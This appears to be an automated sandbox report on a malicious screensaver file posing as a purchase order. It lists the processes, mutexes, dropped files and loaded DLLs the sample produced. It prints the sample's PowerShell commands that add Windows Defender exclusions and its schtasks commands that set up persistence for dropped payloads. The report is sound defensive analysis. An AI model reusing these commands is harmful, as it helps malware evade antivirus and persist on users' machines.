                  Source: perfhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: sppsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OSE.EXE.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PO#_1100015533.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hVVSnrrP.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: VSSVC.exe.11.drBinary string: ::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\?\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )
                  Source: VSSVC.exe.11.drBinary string: Element\Device\HarddiskVolume
                  Source: wbengine.exe.11.drBinary string: >`WindowsBackupLinksLink_{47b7fa87-ce42-48ff-8b18-2f1088121503}Child_{47b7fa87-ce42-48ff-8b18-2f1088121503}\\?\Globalroot\Device\Harddisk%lu\Partition1\a
                  Source: VSSVC.exe.11.drBinary string: \Device\Harddisk%lu\Partition%lu
                  Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winSCR@52/53@63/19
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\logF529.tmp
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6deab63edc8-b
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: NULL
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6de9ea72c54-b
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: \Sessions\1\BaseNamedObjects\QFBxgKCGWQxTLytijuRedtoyKG
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6de-inf
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp
                  Source: PO#_1100015533.scr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO#_1100015533.scr | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: PO#_1100015533.scr | Virustotal: Detection: 31%
                  Source: PO#_1100015533.scr | ReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | File read: C:\Users\user\Desktop\PO#_1100015533.scr
                  Source: unknown | Process created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr" /S
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"
                  Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                  Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                  Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
                  Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknown | Process created: C:\Windows\ehome\ehrecvr.exe C:\Windows\ehome\ehRecvr.exe
                  Source: unknown | Process created: C:\Windows\ehome\ehsched.exe C:\Windows\ehome\ehsched.exe
                  Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknown | Process created: C:\Windows\System32\ieetwcollector.exe C:\Windows\system32\IEEtwCollector.exe /V
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                  Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: webio.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: credssp.dll
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\taskeng.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: wow64win.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: mpr.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: credssp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: davhlpr.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: wkscli.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: cscapi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: credssp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\alg.exe | Section loaded: atl.dll
Source: C:\Windows\System32\alg.exe | Section loaded: wsock32.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe | Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\alg.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
